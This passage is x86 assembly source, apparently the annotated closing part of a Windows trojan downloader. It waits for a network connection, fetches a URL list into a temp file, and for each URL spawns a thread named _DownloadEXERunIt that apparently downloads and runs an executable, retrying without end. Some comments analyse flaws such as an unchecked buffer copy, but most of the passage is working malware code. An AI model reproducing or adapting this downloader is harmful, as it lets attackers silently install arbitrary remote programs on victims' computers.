; storage for the flags output here.
invoke Sleep,3E8h
invoke InternetGetConnectedState,addr ThreadId,0
or eax, eax
jnz InternetConnect_OK
jmp TestInternet
; ---------------------------------------------------------------------------

InternetConnect_OK:
; szShellValue now holds the temp file name used for the URL list.
invoke RtlZeroMemory,addr szShellValue,104h
invoke GetTempFileName,offset PathName,0,0,addr szShellValue

DownList:

; Step 4: fetch the list (1 s pause per attempt), then open it read-only
; (disposition 3 = OPEN_EXISTING) and require at least 0Fh (15) bytes.
invoke Sleep,3E8h
invoke _DownloadFile,offset szUrlList,addr szShellValue,1388h
or eax, eax
jz DownListFailed

mov nThreadCount, 0
invoke CreateFile,addr szShellValue,GENERIC_READ,0,0,3,0,0
cmp eax, INVALID_HANDLE_VALUE
jz ReaptDownList

mov hFile, eax
invoke GetFileSize,hFile,0
cmp eax, 0Fh
jnb BeginDownEXE
invoke CloseHandle,hFile                          ; too short: treat as no list and retry
jmp DownList
; ---------------------------------------------------------------------------

BeginDownEXE:
; Step 5: map the list (2 = PAGE_READONLY, 4 = FILE_MAP_READ) and walk it
; with esi as the read cursor.
invoke CreateFileMapping,hFile,0,2,0,0,0
or eax, eax
jz CreateMapFailed
mov hObject, eax
invoke MapViewOfFile,eax,4,0,0,0
or eax, eax
jz MapViewFailed

mov lpBaseAddress, eax
mov esi, eax

loc_4005E1:
; Start of a line: clear szShellValue and point edi at it. The copy loop
; below has no length check against the 104h-byte buffer and relies on a
; terminating 0 byte inside the mapped view.
lea edi, szShellValue
push 104h
push edi
call RtlZeroMemory

WetherNewLine:
lodsb
cmp al, 0Ah                                       ; skip a line feed
jnz loc_4005F8
lodsb

loc_4005F8:
cmp al, 0Dh                                       ; carriage return terminates the line
jz loc_400605
stosb                                             ; copy the byte into szShellValue
or al, al                                         ; NUL terminates the whole list
jz UrlListEnd
jmp WetherNewLine
; ---------------------------------------------------------------------------
jmp UrlListEnd                                    ; unreachable
; ---------------------------------------------------------------------------

loc_400605:
; End of a line: skip empty lines, otherwise spawn a downloader thread for
; the URL in szShellValue. The 64h (100 ms) sleep presumably gives the thread
; time to copy the URL before the buffer is zeroed for the next line.
cmp szShellValue, 0
jz NextLine
inc nThreadCount                                  ; paired with dec in _DownloadEXERunIt (not interlocked)
invoke CreateThread,0,0,offset _DownloadEXERunIt,addr szShellValue,0,addr ThreadId
invoke CloseHandle,eax
invoke Sleep,64h

NextLine:
jmp loc_4005E1
; ---------------------------------------------------------------------------

UrlListEnd:

; Cleanup in reverse order of acquisition; the failure labels fall through.
invoke UnmapViewOfFile,lpBaseAddress

MapViewFailed:
invoke CloseHandle,hObject

CreateMapFailed:
invoke CloseHandle,hFile
jmp WetherTreadend
; ---------------------------------------------------------------------------

ReaptDownList:
jmp DownList                                      ; could not open the list file: fetch again
; ---------------------------------------------------------------------------
jmp WetherTreadend                                ; unreachable
; ---------------------------------------------------------------------------

DownListFailed:
jmp DownList                                      ; download failed: retry indefinitely
; ---------------------------------------------------------------------------

WetherTreadend:

; Step 6: poll every 100 ms until all downloader threads have finished.
cmp nThreadCount, 0
jz ExitProgram
invoke Sleep,64h
jmp WetherTreadend
; ---------------------------------------------------------------------------

ExitProgram:
invoke ExitProcess,0

main endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
